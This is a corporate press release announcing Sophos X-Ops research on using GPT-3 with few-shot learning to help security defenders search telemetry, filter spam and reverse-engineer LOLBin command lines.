Sophos, a global leader in innovating and delivering cybersecurity as a service, today released new research on how the cybersecurity industry can leverage GPT-3, the language model behind the now well-known ChatGPT framework, as a co-pilot to help defeat attackers.
The latest report, “Applying AI Language Processing to Cyber Defenses,” details projects developed by Sophos X-Ops using GPT-3’s large language models to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of “living off the land” binary (LOLBin) attacks.
“Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring.
Can AI help wannabee attackers write malware or help cybercriminals write much more convincing phishing emails? Perhaps, but, at Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different.
The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings,” said Sean Gallagher, principal threat researcher, Sophos.
Sophos X-Ops researchers, including SophosAI Principal Data Scientist Younghoo Lee, have been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders.
All three use a technique called “few-shot learning” to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.
Finally, Sophos researchers were able to create a program to simplify the process of reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins’ behavior—and putting a stop to those types of attacks in the future.
“One of the growing concerns within security operation centers is the sheer amount of ‘noise’ coming in. There are just too many notifications and detections to sort through, and many companies are dealing with limited resources.
We’ve proved that, with something like GPT-3, we can simplify certain labor-intensive processes and give back valuable time to defenders.
We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments. In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts,” said Gallagher.